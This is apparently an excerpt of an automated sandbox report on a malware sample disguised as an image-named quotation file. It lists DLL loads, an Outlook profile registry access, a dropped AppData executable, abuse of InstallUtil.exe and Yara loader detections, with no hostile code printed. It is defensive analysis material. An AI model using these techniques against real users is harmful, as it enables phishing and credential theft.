                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.00000000036DF000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.00000000036DF000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 6.2.Gydvapkca.exe.3efb240.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.6380000.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Gydvapkca.exe.3c8b240.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4b3b240.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.497de10.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2322264218.0000000003EFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2248365081.0000000003C8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FF78C push es; retf 0_2_064FF7A0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064FF7A1 push es; retf 0_2_064FF7A0
